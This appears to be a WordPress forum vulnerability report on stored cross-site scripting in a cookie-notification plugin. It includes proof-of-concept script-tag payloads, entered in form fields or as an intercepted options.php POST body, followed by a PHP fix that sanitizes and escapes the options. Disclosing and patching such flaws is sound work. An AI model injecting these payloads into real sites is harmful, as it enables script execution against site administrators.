• Input fields:

    Notification text
    Read more text
    Read more URL
    Button text
    and more

    Are vulnerable to stored cross-site scripting.

    PoC:

    Input <script>alert(666);</script>
    in the Notification text input field,
    and the JavaScript will be executed, and stored after saving.

    Or

    Intercept the /wp-admin/options.php POST request (body containing option_page=cpwp_database_settings) in Burp and modify the request body, with values:
    cpwp_database_message=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
    cpwp_database_readMoreText=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
    cpwp_database_readMoreLink=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E
    cpwp_database_buttonText=%3Cscript%3Ealert%28666%29%3B%3C%2Fscript%3E

    And send.

    The JavaScript will be stored, and executed when loading Cookie Notification under Settings in the admin panel.

  • The topic ‘Stored Cross-Site Scripting in Version 1.4’ is closed to new replies.
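A sketch of the fix for the issue reported above, added here as an example and not taken from the plugin's code: sanitize each option when it is saved through options.php, and escape it again wherever it is printed. The option names and the option group come from the POST parameters in the report; the `cpwp_example_*` function names and the markup are hypothetical, and it is an assumption that the plugin stores these values through the WordPress Settings API.

```php
<?php
// Added example, not the plugin's own code. Option names and the option group
// are taken from the report; cpwp_example_* names and the markup are hypothetical.

// 1. Sanitize on save: options.php applies each sanitize_callback before storing.
add_action( 'admin_init', 'cpwp_example_register_settings' );
function cpwp_example_register_settings() {
    $group       = 'cpwp_database_settings'; // option_page value from the report
    $text_fields = array(
        'cpwp_database_message',
        'cpwp_database_readMoreText',
        'cpwp_database_buttonText',
    );
    foreach ( $text_fields as $name ) {
        register_setting( $group, $name, array(
            'type'              => 'string',
            'sanitize_callback' => 'sanitize_text_field', // strips tags from the value
        ) );
    }
    register_setting( $group, 'cpwp_database_readMoreLink', array(
        'type'              => 'string',
        'sanitize_callback' => 'esc_url_raw', // drops URLs with disallowed schemes
    ) );
}

// 2. Escape on output in the admin settings form (HTML attribute context).
function cpwp_example_render_message_field() {
    printf(
        '<input type="text" name="cpwp_database_message" value="%s" class="regular-text" />',
        esc_attr( get_option( 'cpwp_database_message', '' ) )
    );
}

// 3. Escape on output in the front-end notice (HTML text and URL contexts).
function cpwp_example_render_notice() {
    printf(
        '<p>%s <a href="%s">%s</a></p><button type="button">%s</button>',
        esc_html( get_option( 'cpwp_database_message', '' ) ),
        esc_url( get_option( 'cpwp_database_readMoreLink', '' ) ),
        esc_html( get_option( 'cpwp_database_readMoreText', '' ) ),
        esc_html( get_option( 'cpwp_database_buttonText', '' ) )
    );
}
```

Output escaping is the part that also covers values already stored before the sanitize callbacks were in place.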